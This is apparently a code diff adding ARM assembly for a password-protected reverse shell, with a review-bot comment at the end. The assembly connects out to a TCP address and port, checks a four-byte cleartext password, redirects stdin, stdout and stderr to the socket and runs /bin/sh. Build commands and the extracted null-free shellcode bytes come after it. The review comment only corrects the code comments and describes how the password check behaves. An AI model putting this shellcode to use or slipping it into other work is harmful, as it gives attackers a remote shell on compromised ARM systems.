+ strb r2, [r1, #5] // replace the 1st '255' values of the IP field with a 0
+ strb r2, [r1, #6] // replace the 2nd '255' values of the IP field with a 0
+ mov r2, #16
+ add r7, #2 // 281 + 2 = 283
+ svc #1
+
+// [003] read(sourcefd, destbuffer, amount)
+ push {r1}
+ mov r1, sp
+ mov r2, #4
+ mov r7, #3
+ read_pass:
+ mov r0, r10
+ svc #1
+ check_pass:
+ ldr r3, pass
+ ldr r4, [r1]
+ eor r3, r3, r4
+ bne read_pass
+
+// [063] dup2(sockfd, stdIO)
+ mov r1, #2 // r1 = 2 (stderr)
+ mov r7, #63 // r7 = 63 (dup2)
+ loop_stdio:
+ mov r0, r10 // r0 = saved sockfd
+ svc #1
+ sub r1,#1
+ bpl loop_stdio // loop while r3 >= 0
+
+// [011] execve(command, 0, 0)
+ adr r0, command
+ eor r2, r2
+ eor r1, r1
+ strb r2, [r0, #7]
+ mov r7, #11
+ svc #1
+
+// 2 bytes aligment fix if needed needed (can't use a nop as it has a null byte)
+// align_bytes : .byte 0xff, 0xff
+
+target:
+ // The 0xff will be replaced with a null on runtime
+ .ascii "\x02\xff" // Protocol: IPv4/TCP.
+
+ .ascii "\x11\x5c" // Port : 4444
+
+ // The '255' will be replaced with a 0 on runtime
+ .byte 127,255,255,1 // IP: 127.0.0.1.
+
+command: .ascii "/bin/sh?" // The '?' will be replaced with a null on runtime
+
+pass: .ascii "S59!"
+
+
+/*
+ Compile, link & extract:
+
+ as ARM-reverse-shell.s -o ARM-reverse-shell.o
+ ld -N ARM-reverse-shell.o -o ARM-reverse-shell
+ objcopy -O binary ARM-reverse-shell ARM-reverse-shell.dump
+ hexdump -v -e '"\\""x" 1/1 "%02x" ""' ARM-reverse-shell.dump
+
+ \x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x82\x46\x0e\xa1\x4a
+ \x70\x4a\x71\x8a\x71\x10\x22\x02\x37\x01\xdf\x02\xb4\x69\x46\x04\x22\x03\x27\x50\x46\x01\xdf\x0b\x4b
+ \x0c\x68\x63\x40\xf9\xd1\x02\x21\x3f\x27\x50\x46\x01\xdf\x01\x39\xfb\xd5\x04\xa0\x52\x40\x49\x40\xc2
+ \x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\x7f\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x3f\x53\x35\x39\x21
+
+*/
\ No newline at end of file
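Review bot: The comment on `bpl loop_stdio` says `loop while r3 >= 0`, but the counter being decremented two lines above is r1 (`sub r1,#1`), so it should read `// loop while r1 >= 0 (2=stderr, 1=stdout, 0=stdin)`. The `.ascii "\x02\xff"` line is labelled "Protocol: IPv4/TCP", yet the first halfword of a sockaddr_in is `sin_family` (2 = AF_INET once the 0xff is patched to 0); the protocol is the third argument of the socket call above, so the comment and the `strb r2, [r1, #1]` comment should both say "family". The password gate reads exactly 4 bytes into the slot created by `push {r1}` and compares the whole word with `eor`, so a client that sends `S59!` in two writes, or a `read` that returns fewer than 4 bytes, leaves stale bytes in the slot and the check loops until one single 4-byte read matches; the header should say the password must arrive in one write, and that a 4-byte constant shipped in cleartext inside the payload is a nuisance filter rather than an authentication control.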